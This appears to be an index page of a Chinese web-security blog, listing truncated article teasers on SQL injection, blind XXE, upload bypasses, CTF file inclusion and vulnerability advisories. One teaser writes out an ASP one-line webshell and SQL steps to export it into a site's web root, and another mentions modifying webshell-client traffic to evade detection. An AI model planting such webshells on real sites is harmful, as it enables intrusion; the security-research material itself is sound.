欢迎关注公众号《TEST安全》,定时更新安全相关内容
WEB安全
  • CVE-2020-19961(zzcms存在sql注入漏洞)

    zz cms 2019 subzs.php 存在sql注入漏洞 文件对应路径:  zs/subzs.php 注入漏洞存在位置: 在showcookiezs函数中,第十六行sql语句将cookie中接收的zzcmscpid没闭合直接拼接 查找调用showcookiezs的函数,在fix函……

    漏洞空间 2024-01-23
    0 0
  • access数据库导出数据表内容到根目录

    创建表a1字段b create table a1(b text) 像表a1字段b里面写入数据 insert into a1 (b) values('<%execute request(1)%>') 把写入的数据导出到D:\web\11.asp SELECT b into [<%execute request(1)%>] i……

    漏洞空间 2023-11-24
    0 0
  • 冰蝎4.0流量分析及魔改

    冰蝎4.0流量分析及魔改 0x00 前言 冰蝎v4.0开放了传输协议的自定义功能,使得流量魔改更为简单方便,本文以jsp脚本类型为例,提供一些冰蝎4流量魔改的方式 0x01传输协议分析 冰蝎4内置了如下几种传输协议,传输协……

    漏洞空间 2023-08-19
    0 0
  • XXE漏洞之解决读带特殊字符的文件无回显问题

    无回显读取本地敏感文件(Blind OOB XXE) xml.php(保存当根目录如127.0.0.1/xml.php) <?php libxml_disable_entity_loader (false); $xmlfile = file_get_contents('php://input'); $dom = new DOMDocume……

    漏洞空间 2023-05-31
    0 0
  • 泛微 E-Office 命令注入漏洞 CVE-2023-2647

    漏洞描述 泛微 E-Office 9.5版本中文件上传处理程序接口/webroot/inc/utility_all.php存在命令注入漏洞,攻击者可以通过远程控制接口输入恶意命令执行恶意操作。 漏洞级别 严重 影响范围 泛微 E-Office 9.5 漏洞修……

    漏洞空间 2023-05-13
    0 0
  • 【文件上传绕过】解析漏洞_.htaccess文件解析漏洞

    一、实验目的: 1、了解什么是.htaccess文件。 2、通过upload-labs闯关游戏(Pass-04),掌握.htaccess文件解析漏洞技术。 二、工具: cmd命令行 火狐/谷歌浏览器 三、实验环境: 靶 机: windows10虚拟机:192.168……

    漏洞空间 2023-05-13
    0 0
  • 【文件上传绕过】–二次渲染漏洞

    一、实验目的: 1、通过实验学习二次渲染原理的成因。 2、通过搭建漏洞环境,学习绕过技巧。 二、漏洞说明: 1. 二次渲染原理: 1、配合文件包含漏洞:   将一句话木马插入到网站二次处理后的图片中,也就是……

    漏洞空间 2023-05-13
    0 0
  • CTF中关于文件包含漏洞

    <?php highlight_file(__FILE__); require_once 'flag.php'; if(isset($_GET['file'])) { require_once($_GET['file']); } 场景描述:我们在审计时找到一处文件包含漏洞(使用require_once或include_……

    漏洞空间 2023-05-05
    0 0
  • 某应用虚拟化系统远程代码执行

    漏洞简介 微步在线漏洞团队通过“X漏洞奖励计划”获取到瑞友天翼应用虚拟化系统远程代码执行漏洞情报(0day),攻击者可以通过该漏洞执行任意代码,导致系统被攻击与控制。瑞友天翼应用虚拟化系统是基于服务器计算架构……

    漏洞空间 2023-04-25
    0 0
  • Apache Druid远程代码执行漏洞

    影响范围 Apache Druid 全版本 Apache Druid远程代码执行漏洞 Apache Druid是一个高性能的实时大数据分析引擎,支持快速数据摄取、实时查询和数据可视化。它主要用于OLAP(在线分析处理)场景,能处……

    漏洞空间 2023-04-22
    0 0